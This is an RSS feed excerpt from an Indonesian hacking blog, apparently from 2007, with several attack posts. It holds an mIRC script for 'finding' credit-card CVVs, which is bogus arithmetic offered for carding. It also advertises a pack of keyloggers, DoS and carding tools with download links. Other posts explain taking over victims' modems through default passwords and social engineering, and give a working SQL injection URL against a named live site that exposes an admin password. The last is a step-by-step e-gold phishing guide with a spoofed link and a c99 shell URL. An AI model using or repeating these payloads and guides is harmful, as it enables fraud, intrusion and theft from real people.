/&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/11/dasar-dasar-sql-injection-1.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-8409992810120781972</guid><pubDate>Thu, 01 Nov 2007 03:43:00 +0000</pubDate><atom:updated>2007-10-31T20:45:27.949-07:00</atom:updated><title>Script Cek CVV Credit Card Lewat mIRC</title><description>&lt;p&gt;Ini adalah script buat ngecek cvv dari kartu kredit.&lt;br /&gt;perlu dicatat 90% hasilnya adalah benar… bukan pasti benar.&lt;/p&gt; &lt;p&gt;caranya, buka irc (ga perlu konek ke server). klik Alt+R&lt;br /&gt;nah akan keluar box. pada tab remote tsb, masukkan script di bawah ini :&lt;/p&gt; &lt;p&gt;&lt;code&gt;alias f5 cvv2&lt;br /&gt;menu status,channel,query {&lt;br /&gt;-&lt;br /&gt;Cari CVV:cvv2&lt;br /&gt;}&lt;br /&gt;alias cekcvv2 {&lt;br /&gt;set %cv1 $left(%cc,8)&lt;br /&gt;set %cv1.1 $right(%cv1,1)&lt;br /&gt;set %cv2 $left(%cc,12)&lt;br /&gt;set %cv2.2 $right(%cv2,1)&lt;br /&gt;set %cv3 $left(%cc,3)&lt;br /&gt;set %cv3.3 $right(%cv3,1)&lt;br /&gt;set %cv4 $left(%cc,1)&lt;br /&gt;set %cv4.4 $calc(%cv3.3 + 1)&lt;br /&gt;set %cvv2 %cv1.1 $+ %cv2.2 $+ %cv4.4&lt;br /&gt;set %cvv $left(%cvv2,3)&lt;br /&gt;.timer 2 2 /echo  CVV dari %cc adalah %cvv Sikat!!!&lt;br /&gt;.timer 1 5 /echo  —– CVV2 Edited by LeNK #balihackerlink on DALNet —– &lt;/code&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;}&lt;br /&gt;alias cvv2 dialog -m cvv2 cvv2&lt;br /&gt;dialog cvv2 {&lt;br /&gt;title “CVV Finder by LeNK”&lt;br /&gt;size -1 -1 250 145&lt;br /&gt;box “Enjoy..!!”,2, 4 4 242 110&lt;br /&gt;text “Masukan No CC Yang akan di cari CVV-nya”,4, 1 30 249 25, center&lt;br /&gt;edit “”,5, 55 57 140 20 ,autohs&lt;br /&gt;button “&amp;amp;Cari..!!!”,3, 80 85 100 20,defult,ok&lt;br /&gt;text “Email : l3nk@walla.com “,7, 1 120 249 25, center,disable&lt;br /&gt;}&lt;br /&gt;on 1:dialog:cvv2:*:*: {&lt;br /&gt;if ($devent == sclick) {&lt;br /&gt;if ($did == 3) {&lt;br /&gt;.set %cc $did(5)&lt;br /&gt;.timer 1 1 cekcvv2&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;}&lt;/code&gt;&lt;/p&gt; &lt;p&gt;jika sudah, klik OK.&lt;br /&gt;nah cara makenya, klik kanan di layar irc dan akan ada pilihan cari cvv pada bagian bawah. masukkan no kartu kreditnya, dan dapatilah hasilnya…&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-8409992810120781972?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/script-cek-cvv-credit-card-lewat-mirc.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-5384291755179189046</guid><pubDate>Thu, 01 Nov 2007 03:38:00 +0000</pubDate><atom:updated>2007-10-31T20:39:28.309-07:00</atom:updated><title>CD Hacking Tools 2007 - Gratis</title><description>XxxPass-Team 2007&lt;br /&gt;Danger Cracking &amp;amp; Hacking Tools - Ver 1.0&lt;br /&gt;&lt;br /&gt;- Exploit Collection (4 Tools)&lt;br /&gt;- Google Hacking (4 Tools)&lt;br /&gt;- Keyloggers (5 Tools)&lt;br /&gt;- Binder &amp;amp; Packer (15 Tools)&lt;br /&gt;- Flood_DOS (20 Tools)&lt;br /&gt;- Messenger (11 Tools)&lt;br /&gt;- Bruter (9 Tools)&lt;br /&gt;- Anonimity (1 Tool)&lt;br /&gt;- !!! $$$ !!! (13 Tools)&lt;br /&gt;- AIO&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Exploit Collection&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. 10377 Exploit&lt;br /&gt;2. SMF ShoutBox Xss &amp;amp; HTML Injection&lt;br /&gt;3. SMF Ultimate Shoutbox Cookie Disclosure Exploit&lt;br /&gt;4. Firefox_BuG&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Messenger&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. MSN Extreme 3.0&lt;br /&gt;2. MSN Spy Lite v1.0&lt;br /&gt;3. Yahoo Hack!&lt;br /&gt;4. Hotmail Email Hacker&lt;br /&gt;5. Hotmail Hacker Gold&lt;br /&gt;6. HotmailHack&lt;br /&gt;7. YahooUltraCracker&lt;br /&gt;8. winks,moods,mugins,weemees and meegos + Installer&lt;br /&gt;9. MSN Messenger Account Cracker v2.0&lt;br /&gt;10. SH Yahoo Pass Sender 1.1&lt;br /&gt;11. Yahoo Password Decoder&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Google Hacking&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Alt GooGle&lt;br /&gt;2. Google Version 1.2&lt;br /&gt;3. Google H4ck3r (3 programs)&lt;br /&gt;4. GooLink&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Keyloggers&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Elgolf 1.0 Beta&lt;br /&gt;2. ESK KeyLogger&lt;br /&gt;3. Glog Keylogger&lt;br /&gt;4. HermanAgent&lt;br /&gt;5. IKlogger0.1&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Bbruter&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. WebCrack v4.0&lt;br /&gt;2. Brutus&lt;br /&gt;3. Crack FTP&lt;br /&gt;4. FTP Brute Hacker&lt;br /&gt;5. phpbb bruteforcer&lt;br /&gt;6. PhpBB Pass Extractor&lt;br /&gt;7. phpBB Cracker&lt;br /&gt;8. Email Cracker&lt;br /&gt;9. FTP Brute Forcer&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;!!! $$$ !!!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Cmaster&lt;br /&gt;2. CC Verify&lt;br /&gt;3. CWizard&lt;br /&gt;4. THCC&lt;br /&gt;5. Visa Card Generator 06&lt;br /&gt;6. Carcabot_Mass_Email&lt;br /&gt;7. CcHack&lt;br /&gt;8. CC-Fake&lt;br /&gt;9. cvv2c&lt;br /&gt;10. DesertCVV2&lt;br /&gt;11. id-fake&lt;br /&gt;12. Paypal-Link-Spoofed&lt;br /&gt;13. HoW to get Credit Cards Fresh and Fastest&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;AIO&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Uploader for All&lt;br /&gt;2. Cool Small Usefull Dp&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Flood DOS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Flowbabeflow&lt;br /&gt;2. FreeSiteKiller V 2.01&lt;br /&gt;3. Webxgrab&lt;br /&gt;4. Web Attacker ENG&lt;br /&gt;5. TheRapist-Dos Attacker&lt;br /&gt;6. HybridFlood2&lt;br /&gt;7. Ati-russ 3.0&lt;br /&gt;8. Http Bomber v1.001b&lt;br /&gt;9. Sprut&lt;br /&gt;10. DoS_5&lt;br /&gt;11. etherflood&lt;br /&gt;12. DoSAttacker&lt;br /&gt;13. phpBB Dos&lt;br /&gt;14. phpBB Attacker&lt;br /&gt;15. Ping Attack&lt;br /&gt;16. Site Nuke&lt;br /&gt;17. Divine Intervention&lt;br /&gt;18. UC Forum Spammer&lt;br /&gt;19. Inferno Nuker&lt;br /&gt;20. Multiple Site Flood&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Silahkan di download di :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/24341192/XxxPass-C_H_Ver1.0-_2007-part1.rar.html&lt;br /&gt;http://rapidshare.com/files/24350769/XxxPass-C_H_Ver1.0-_2007-part2.rar.html&lt;br /&gt;Pass : XxxPass_DJ_haselking&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Hack&lt;/span&gt; ... &lt;span style="font-weight: bold;"&gt;hack&lt;/span&gt; ... &lt;span style="font-weight: bold;"&gt;hack&lt;/span&gt; the World !! :D&lt;br /&gt;&lt;!-- google_ad_section_end --&gt;( Just for lamerz )        Ref:&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-5384291755179189046?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/cd-hacking-tools-2007-gratis.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-1667105297458082697</guid><pubDate>Thu, 01 Nov 2007 03:34:00 +0000</pubDate><atom:updated>2007-10-31T20:34:45.141-07:00</atom:updated><title>Hacking Modem Speedy dan Penanganannya</title><description>&lt;span class="judul_content"&gt;&lt;b&gt;Hacking Modem Speedy dan Penanganannya&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. :D &lt;/p&gt; &lt;p&gt;Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default. &lt;/p&gt; &lt;p&gt;Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan : &lt;/p&gt; &lt;p&gt; &lt;/p&gt; &lt;p&gt;&lt;br /&gt;Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )&lt;/p&gt; &lt;p&gt;Website dengan log system flat file ( diambil dari artikelnya Anggi J. )&lt;/p&gt; &lt;p&gt;Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )&lt;/p&gt; &lt;p&gt;Internet Password Asterisk Reveal &lt;/p&gt; &lt;p&gt;( &lt;a href="http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe"&gt;http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe&lt;/a&gt; )&lt;/p&gt; &lt;p&gt; &lt;/p&gt; &lt;p&gt;&lt;br /&gt;Langkah Pertama&lt;/p&gt; &lt;p&gt;Silahkan anda baca artikel &lt;a href="http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/"&gt;http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/&lt;/a&gt;&lt;br /&gt;, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.&lt;/p&gt; &lt;p&gt; &lt;/p&gt; &lt;p&gt;&lt;br /&gt;Langkah Ke Dua&lt;/p&gt; &lt;p&gt;Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :&lt;/p&gt; &lt;p&gt; &lt;/p&gt; &lt;p&gt;&lt;br /&gt;Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???&lt;/p&gt; &lt;p&gt;Sang_korban : apaan tuh ?&lt;/p&gt; &lt;p&gt;Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.&lt;/p&gt; &lt;p&gt;Sang_korban : coba, gw liat dulu. # kena!! &lt;/p&gt; &lt;p&gt;Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U &lt;/p&gt; &lt;p&gt; &lt;/p&gt; &lt;p&gt;&lt;br /&gt;Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file. &lt;/p&gt; &lt;p&gt;Contoh IP yang sudah dilog dalam flat file, &lt;/p&gt; &lt;p&gt; &lt;/p&gt; &lt;p&gt;&lt;br /&gt;Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 | Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)  | URL: / | Referrer: | Proxy:  | Koneksi:&lt;/p&gt; &lt;p&gt; &lt;/p&gt; &lt;p&gt;Langkah Ketiga&lt;/p&gt; &lt;p&gt;Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah &lt;a href="http://125.160/"&gt;http://125.160&lt;/a&gt;.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal. &lt;/p&gt; &lt;p&gt; &lt;/p&gt; &lt;p&gt; &lt;/p&gt; &lt;p&gt; &lt;/p&gt; &lt;p&gt;Penanganan&lt;/p&gt; &lt;p&gt;Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te --&gt; bentuk lain dari ilmuwebsite&lt;/p&gt; &lt;p&gt; &lt;/p&gt; &lt;p&gt;&lt;br /&gt;Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.&lt;/p&gt; &lt;p&gt;Default password untuk setiap modem :&lt;/p&gt; &lt;p&gt;&lt;a href="http://www.elitehackers.info/defaultpasslist.php"&gt;http://www.elitehackers.info/defaultpasslist.php&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-1667105297458082697?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/hacking-modem-speedy-dan-penanganannya.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-643532307357994200</guid><pubDate>Thu, 01 Nov 2007 03:31:00 +0000</pubDate><atom:updated>2007-10-31T20:33:12.436-07:00</atom:updated><title>SQL Injection</title><description>&lt;b&gt;SQL Injection&lt;/b&gt;&lt;br /&gt;By k0il&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;SQL Injection AJ Auction seluruh versi SQL Injection pada Aj Auction untuk seluruh versi. ============================================================= &lt;/p&gt;&lt;p&gt;Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk sebagai admin pada situs yang memiliki bug pada halaman subcat.php &lt;/p&gt;&lt;p&gt;langsung aja buka google-nya ... masukkan keyword ini inurl:/subcat.php?cate_id= nah loh, dapet banyak bangett ... pilih aja salah satunya &lt;/p&gt;&lt;p&gt;contoh : http://www.estoop.it/subcat.php?cate_id=146&amp;amp;view=list&amp;amp;PHPSESSID=27c9b2b6500f2c01c09eda1978d45096 setelah cate_id= &lt;/p&gt;&lt;p&gt;di hapus aja kemudian di ganti dengan &lt;/p&gt;&lt;p&gt;-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas sword),2%20from%20admin/*&amp;amp;view=list &lt;/p&gt;&lt;p&gt;kira kira jadi begini &lt;/p&gt;&lt;p&gt;http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11 7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&amp;amp;view=list &lt;/p&gt;&lt;p&gt;nah loh passwordnya langsung dapet &lt;/p&gt;&lt;p&gt;turkey:adminturkeypass:daniel87 itu artinya usernamenya admin passwordnya daniel87 sekarang masuk ke control panelnya &lt;/p&gt;&lt;p&gt;http://www.estoop.it/admin terus masukkin username dan passwordnya jreng jreng jreng anda di bawa ke control panel &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7712600665289475099-643532307357994200?l=gresikblog.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://gresikblog.blogspot.com/2007/10/sql-injection_31.html</link><author>noreply@blogger.com (gresikblog)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-7712600665289475099.post-5496210780280152345</guid><pubDate>Thu, 01 Nov 2007 03:29:00 +0000</pubDate><atom:updated>2007-10-31T20:30:16.963-07:00</atom:updated><title>Tutorial phising e-gold account</title><description>&lt;b&gt;Tutorial phising e-gold account&lt;/b&gt;&lt;br /&gt;By th3sn0wbr4in&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bila anda bingung dengan judul di atas, mungkin anda lebih familiar dengan kata-kata berikut : "Tutorial mencuri e-gold", "Tutorial hack e-gold". Tapi, saya sendiri kurang suka dengan kata-kata hack e-gold, karena terdengar kurang pantas saja bila menggunakan kata hack. Di tutorial ini, kita akan membuat situs e-gold yang palsu, dan kemudian mengundang para korban untuk login ke situs e-gold palsu milik kita sehingga semua data yang di-input oleh sang korban akan dikirim ke e-mail kita. Tutorial ini diutamakan untuk pemula, yang medium dan advanced -pun boleh membacanya walau hanya untuk sekedar menghabiskan waktu atau sekedar memaki tutorial ini (*atau penulisnya). Tutorial ini hanyalah sebagai pengetahuan semata, segala kerugian yang diakibatkan oleh artikel ini, bukan tanggung jawab penulis.&lt;br /&gt;Hal-hal yang harus dipersiapkan kurang lebih sebagai berikut :&lt;br /&gt;&lt;br /&gt;- Web Hosting / Host / PHP Shell / cPanel atau istilah lainnya yang mendukung PHP.&lt;br /&gt;Banyak orang di luar sana yang menggunakan istilah demikian, cpanel, host, php shell atau apalah. Intinya yang kita butuhkan adalah sebuah web hosting dengan dukungan php. Beruntunglah bagi anda yang sering bermain-main dengan php shell, atau mungkin mengutak-atik web sendiri. Karena anda tidak perlu bersusah payah untuk menempatkan situs e-gold anda nantinya atau bila masih kesulitan, setidaknya tahu bagaimana cara mendapatkannya. Namun, jika anda yang masih kesulitan dan belum mengerti bagaimana untuk mendapatkan web hosting sebagai tempat situs e-gold palsu, sepertinya anda harus sedikit bekerja keras untuk mendapatkannya, bisa meminta, berusaha mencari sendiri, atau bagaimanalah. Tapi yang jelas, saya tidak akan memberitahu caranya secara detail di sini, karena sudah banyak situs-situs berbahasa indonesia yang menyediakan cara untuk mendapatkan php shell, cpanel dsb. Atau, anda bisa juga menggunakan CC (Credit Card) untuk memesan web host secara online. Atau cara lain ? Silahkan berfantasi dengan kreativitas anda. Dan jangan lupa, yang terpenting adalah mendukung PHP dan bisa digunakan untuk mengirim e-mail.&lt;br /&gt;Nah, untuk menjebak korban masuk ke dalam lubang jebakan sudah dimulai. Lubang jebakannya sudah disiapkan, lalu ?&lt;br /&gt;&lt;br /&gt;- E-gold scampage&lt;br /&gt;Agar korban mau masuk ke dalam lubang jebakan yang kita buat, kita harus membuat lubang jebakan tersebut tidak terlihat seperti lubang jebakan, namun terlihat biasa saja. Kira-kira seperti itulah fungsi scampage ini, dan menurut pendapat pribadi scampage adalah duplikat dari situs asli dan mengedit beberapa bagian sesuai kebutuhan/penipuan atau simple-nya duplikasi situs untuk menipu. Scampage ini merupakan scampage bikinan saya sendiri (*makanya jelek), yang merupakan komposisi dari, situs asli www.e-gold.com, dan menggunakan beberapa campuran script dari scampage yang dibuat oleh phiser lain, namun tidak di-update sehingga tampilannya tidak lagi terlihat seperti situs asli.&lt;br /&gt;Download e-gold scampage di :&lt;br /&gt;http://geocities.com/th3sn0wbr4in/egoldscampage.zip&lt;br /&gt;Setelah anda men-download egoldscampage.zip ke komputer anda, extract file egoldscampage.zip dan edit file login.php dan login1.php yang terletak di folder www.egold.comacct.&lt;br /&gt;Pada bagian $to = "your@e-mail.com"; ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung accountID + password e-gold dari korban-korban anda. Begitu juga pada file login1.php, ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung e-mail + password si korban.&lt;br /&gt;Simpan semua perubahan yang sudah anda lakukan, dan sekarang upload file egoldscampage.zip ke Web Hosting yang sudah anda siapkan sebelumnya dan extract file egoldscampage.zip di Web hosting anda.&lt;br /&gt;&lt;br /&gt;- E-mail palsu&lt;br /&gt;Anda memasuki zona terlarang!!! Lewat sini agar anda selamat - TTD, Warga Sekitar. Kira-kira seperti itulah papan yang terpampang ketika anda sedang melewati daerah asing. Orang yang belum mengenal betul daerah tersebut, pasti akan mengikuti petunjuk jalan yang diberikan, apalagi ada tanda bahwa informasi ini berasal dari orang sekitar. Bagi yang panik, tentu mereka tidak lagi berpikir panjang dan langsung mengikuti petunjuk yang ada, sehingga mereka terjebak ke dalam lubang yang kita buat.&lt;br /&gt;Kurang lebih, begitulah fungsi si 'e-mail palsu'. Berikut ini adalah dua buah e-mail palsu yang mungkin bisa anda gunakan.&lt;br /&gt;http://geocities.com/th3sn0wbr4in/gold-letter-1.txt&lt;br /&gt;http://geocities.com/th3sn0wbr4in/gold-letter-2.txt&lt;br /&gt;&lt;br /&gt;Untuk gold-letter-1.txt, ada bagian yang harus anda ubah sebelum e-mail tersebut dikirimkan ke korban.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Please update your records on or before October 5th, 2007.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ganti October 5th, 2007 dengan tanggal 3-5 hari kemudian ketika anda mengirimkan e-mail palsu. Misalnya, anda mengirim e-mail tersebut pada tanggal 1 October 2007, anda ganti menjadi 3-5 hari ke depan sebagai tenggang waktu untuk sang korban.&lt;br /&gt;Pada gold-letter tersebut, ada 4 bagian yaitu : From, Name, Subject, dan Message. Keempat-nya ini akan digunakan pada Inbox Mailer nanti. Jika anda ingin melihat preview e-mail tersebut, copy-paste Message dari letter tersebut ke notepad, dan save sebagai file html. Di setiap e-mail tersebut, terdapat sebuah link yang akan mengarahkan korban ke situs e-gold milik anda.&lt;br /&gt;Contoh pada gold-letter-1.txt, jika anda melihat preview dari e-mail tersebut, isinya adalah demikian :&lt;br /&gt;&lt;br /&gt;To update your E-gold records click on the following link:&lt;br /&gt;&lt;br /&gt;https://www.e-gold.com/acct/login.html&lt;br /&gt;&lt;br /&gt;Namun, bila anda melihat html code-nya, isinya adalah demikian :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To update your &lt;b&gt;E-gold&lt;/b&gt; records click on the following link:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html" onmouseout="window.status='';" onmouseover="window.status='https://www.e-gold.com/acct/login.html';return true;" target="_blank" style="font-size: 10pt; color: black; font-family: Verdana;"&gt;&lt;br /&gt;https://www.e-gold.com/acct/login.html&lt;/a&gt;&lt;p&gt; &lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Jadi, link https://www.e-gold.com/acct/login.html sebenarnya mengarah ke http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html yang merupakan 'lubang jebakan' milik th3sn0wbr4in. Ganti http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html dengan alamat situs e-gold milik anda sendiri yang sudah anda persiapkan.&lt;br /&gt;&lt;br /&gt;Berikut ini, contoh e-mail gold-letter-1 di inbox yahoo milik saya&lt;br /&gt;http://i189.photobucket.com/albums/z55/ianis01/contentmailno4.png&lt;br /&gt;&lt;br /&gt;- PHP Inbox Mass Mailer&lt;br /&gt;Sayangnya, kedua gold-letter tersebut barulah desain. Selama e-mail tersebut masih berada di komputer lokal, tidak ada korban yang bisa melihatnya sehingga tidak satupun terjebak masuk ke dalam jebakan yang sudah anda siapkan. Agar 'para korban' melihat e-mail tersebut, anda harus mengirimkan e-mail ke korban.&lt;br /&gt;Dan bila anda ingin korban anda 'melihat' e-mail tersebut, e-mail anda harus tiba di Inbox sang korban, bukan Bulk, Spam, Junk atau istilah lainnya, karena jarang korban yang mau melihat e-mail yang tiba di kategori-kategori tersebut (Bulk, Spam, Junk, etc) walaupun memang ada, tapi tidak banyak.&lt;br /&gt;Karena itu, anda harus menggunakan PHP Inbox Mass Mailer, merupakan sebuah script PHP yang digunakan untuk mengirimkan e-mail secara massal ke korban.&lt;br /&gt;Contoh tampilannya adalah sebagai berikut :&lt;br /&gt;http://i189.photobucket.com/albums/z55/ianis01/mailergl3.png&lt;br /&gt;Isi field Your Email, Your Name, Subject, dan Message seperti yang tertera pada gold-letter-1 atau gold-letter-2, tapi isi dengan gold-letter yang sudah anda edit.&lt;br /&gt;Script php inbox mass mailer :&lt;br /&gt;http://geocities.com/th3sn0wbr4in/mailer.txt&lt;br /&gt;http://geocities.com/th3sn0wbr4in/mailer.arif.txt&lt;br /&gt;Untuk script mailer.arif.txt, didapat dari teman yang original link-nya adalah&lt;br /&gt;http://geocities.com/aliif_1604/run.txt&lt;br /&gt;&lt;br /&gt;Agar anda bisa menggunakan PHP Inbox Mass Mailer, anda harus meng-upload-nya ke Web Hosting yang mendukung PHP dan mengirim mail. Sekarang bagaimana caranya agar e-mail tersebut masuk inbox, itu tergantung pada Web Hosting tempat anda meng-upload script mailer-nya. Tidak semua host yang bisa mengirim mail tapi tiba di inbox. Apalagi, kita menggunakan AccountRobot_donotreply@e-gold.com sebagai e-mail pengirim. Bagaimana caranya mengetahui apakah host bisa mengirim e-mail dan tiba di inbox ? Cukup upload script mailer, dan coba anda kirim ke e-mail anda sendiri. Apabila anda mendapatkan e-mail palsu anda tiba di inbox, berarti host tersebut layak digunakan untuk mengirim e-mail e-mail palsu ke korban. Pengalaman pribadi saya sendiri, bagian inilah yang paling sulit. Sejak beberapa tahun yang lalu saya sudah menyiapkan semua yang saya butuhkan untuk membuat jebakan ini, tapi selalu terhenti karena belum juga mendapatkan host yang layak untuk mengirimkan e-mail palsu ke korban. Awalnya saya pikir tidak mungkin mendapatkan host yang bisa mengubah alamat pengirim menjadi seperti AccountRobot_donotreply@e-gold.com. Tapi pada akhir tahun 2006, seorang teman yang memiliki Yahoo! ID tommyhacku memberikan saya sebuah host yang bisa melakukannya.&lt;br /&gt;Jadi, selamat berjuang untuk mendapatkannya. Bila anda sudah mendapatkannya, saat-nya mengumpulkan daftar korban.&lt;br /&gt;&lt;br /&gt;- E-mail list&lt;br /&gt;Tentukan siapa korbanmu!!! Bagaimana mengetahui e-mail orang yang memiliki e-gold account?&lt;br /&gt;- Cari dari forum-forum yang berbicara soal e-gold, paypal, atau business&lt;br /&gt;- Cari dari situs-situs HYIP&lt;br /&gt;Tapi sepertinya yang demikian itu cukup sulit. Jadi, kita tidak perlu e-mail yang mana yang mempunyai e-gold account. Masukkan saja semua daftar e-mail ke dalam field target di PHP Mailer. Beberapa cara yang bisa didapatkan untuk mendapatkan e-mail list :&lt;br /&gt;- Beli lewat situs-situs yang menjualnya menggunakan CC. Anda bisa menggunakan keyword "buy e-mail leads" atau keyword lainnya lewat google. Silahkan dicoba-coba keyword lainnya.&lt;br /&gt;- Menggunakan software e-mail extractor&lt;br /&gt;Salah satu software yang terkenal untuk mengumpulkan e-mail adalah Tarantula.&lt;br /&gt;Download software-nya di http://www.emailsmartz.com/downloads/tarantula.exe&lt;br /&gt;Download Patch Tarantula di http://www.geocities.com/toemenggoeng/error/Patch-Tarantula-SG.zip&lt;br /&gt;Jangan tanya saya untuk menggunakannya. Silahkan coba-coba sendiri&lt;br /&gt;&lt;br /&gt;- Action!!!&lt;br /&gt;Setelah semua siap, silahkan kirim e-mail palsu ke daftar korban lewat php mailer anda dan tunggu hasilnya di e-mail anda.&lt;br /&gt;&lt;br /&gt;Secara simple, yang dibutuhkan adalah :&lt;br /&gt;- Host, yang belum punya boleh nyoba http://modelbc.de/administrator/modules/index_page.php (c99 shell)&lt;br /&gt;- Scampage, source : http://geocities.com/th3sn0wbr4in/egoldscampage.zip&lt;br /&gt;- Mailer + Host utk Mailer, source : http://geocities.com/th3sn0wbr4in/mailer.txt&lt;br /&gt;- Mail list&lt;br /&gt;&lt;br /&gt;Tanya-Jawab :&lt;br /&gt;Q:Saya upload scampage-nya ke PHP Shell tapi ber-platform 